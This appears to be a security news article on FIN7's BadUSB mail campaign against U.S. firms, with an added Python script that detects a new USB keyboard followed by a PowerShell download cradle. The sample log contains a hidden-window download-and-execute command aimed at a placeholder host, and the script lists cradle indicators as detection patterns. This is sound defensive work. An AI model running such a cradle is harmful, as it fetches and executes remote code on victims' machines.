A financially motivated threat group has been targeting U.S. firms with BadUSB attacks in the past few months. In a BadUSB attack, a malicious USB device presents itself to the computer as a trusted peripheral (typically a keyboard) and injects commands that deliver malware, so there is no malicious file on the drive for conventional scanning to detect.

The BadUSB campaign

The FBI has received multiple reports of packages laden with USB devices being sent to U.S. businesses.
  • Researchers noted that the FIN7 group targeted a U.S. defense industry firm in November 2021.
  • In this incident, the group had used the Amazon thank-you letter to fool the victim.
  • FIN7 has been using this same BadUSB attack technique to target organizations in insurance and transportation since August 2021.

Anatomy of malicious packages

During the attacks, the attacker used two types of packages.
  • One package pretended to be from the U.S. Department of Health and Human Services (HHS) and contained a letter about COVID-19 guidelines together with a USB drive.
  • The second imitated a gift box package from Amazon, including a counterfeit gift card, a fake thank-you letter, and a USB drive.
  • Both types of packages contained LilyGO-branded USB devices and were sent using UPS and USPS services.

How does the infection work?

When one of these USB drives is plugged into a computer, it may execute a BadUSB attack: the drive registers itself as a keyboard and sends a series of automated, pre-configured keystrokes.
  • These keystrokes execute PowerShell commands that download and install different malware strains acting as backdoors.
  • In one of the investigated cases, the group was observed obtaining admin access and moving laterally.
  • FIN7 used different tools, such as Metasploit, Cobalt Strike, PowerShell scripts, Carbanak, GRIFFON, DICELOADER, TIRION, and deployed BlackMatter and REvil ransomware.
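The infection chain above has two observable stages on the endpoint: a new keyboard-class HID device enumerates, and within seconds PowerShell runs a download-and-execute command. The following detection sketch is an added example and is not code from the article, the FBI alert or FIN7; it correlates the two stages over constructed sample events (the log format, the hostnames, the `VID_1234&PID_ABCD` device id and the `placeholder.invalid` URLs are all made up for the example, and the cradle patterns are the author's own heuristics, not a published signature).

```python
"""
Correlate "new HID keyboard enumerated" with "PowerShell download cradle ran"
on the same host within a short window, which is the BadUSB sequence described
in the text. All events below are constructed samples, not real telemetry.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
import re


@dataclass
class Event:
    ts: datetime
    host: str
    source: str  # "pnp" = device install event, "ps" = PowerShell script block (4104-style)
    text: str


# Heuristic indicators of a PowerShell download cradle (assumption: chosen for this example).
CRADLE_PATTERNS = [
    re.compile(r"DownloadString\s*\(", re.I),
    re.compile(r"Invoke-WebRequest|\biwr\b|\bcurl\b", re.I),
    re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    re.compile(r"-EncodedCommand|-enc\b", re.I),
    re.compile(r"-WindowStyle\s+Hidden|-w\s+hidden", re.I),
]

# A keyboard-class HID device appearing in a device-install event.
HID_KEYBOARD = re.compile(r"HID\\VID_[0-9A-F]{4}&PID_[0-9A-F]{4}.*Class:\s*Keyboard", re.I)

# Constructed sample log: "<ISO timestamp> <host> <source> <free text>"
SAMPLE_LOG = [
    "2021-11-02T09:14:03 WS-042 pnp Device install: HID\\VID_1234&PID_ABCD\\6&2f1a Class: Keyboard",
    "2021-11-02T09:14:09 WS-042 ps powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a')",
    "2021-11-02T09:30:00 WS-042 ps Get-ChildItem C:\\Users",
    "2021-11-02T11:00:00 WS-017 ps Invoke-WebRequest http://placeholder.invalid/b -OutFile x.exe",
]


def cradle_score(text: str) -> int:
    """Number of download-cradle indicators present in a PowerShell script block."""
    return sum(1 for p in CRADLE_PATTERNS if p.search(text))


def parse_line(line: str) -> Event:
    ts, host, source, text = line.split(" ", 3)
    return Event(datetime.fromisoformat(ts), host, source, text)


def find_badusb_sequences(lines, window=timedelta(minutes=5), min_score=2):
    """Return one alert per (keyboard enumeration, cradle) pair on the same host inside `window`."""
    events = sorted((parse_line(l) for l in lines), key=lambda e: e.ts)
    keyboards = [e for e in events if e.source == "pnp" and HID_KEYBOARD.search(e.text)]
    alerts = []
    for kb in keyboards:
        for e in events:
            if e.source != "ps" or e.host != kb.host:
                continue
            if kb.ts <= e.ts <= kb.ts + window and cradle_score(e.text) >= min_score:
                alerts.append({
                    "host": kb.host,
                    "device": kb.text,
                    "command": e.text,
                    "delay_s": int((e.ts - kb.ts).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for a in find_badusb_sequences(SAMPLE_LOG):
        print(f"[ALERT] {a['host']}: cradle {a['delay_s']}s after keyboard enumeration\n  {a['command']}")
```

Requiring both stages keeps a lone, legitimately installed keyboard or a single `Invoke-WebRequest` (host WS-017 above) from firing; the stacked indicators on WS-042 (hidden window, `IEX`, `DownloadString`) six seconds after an unknown keyboard appeared are what make that sequence worth an analyst's time. In a real deployment the `pnp` events would come from the Windows device-install log and the `ps` events from PowerShell script block logging, which must be enabled for this to work.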

Concluding notes

The recent attacks show how inventive and persistent cybercriminals are in targeting victims across multiple industries. According to the FBI, U.S. businesses should register on the InfraGard portal to access the alert and obtain more information about FIN7's BadUSB attacks.

Cyware Publisher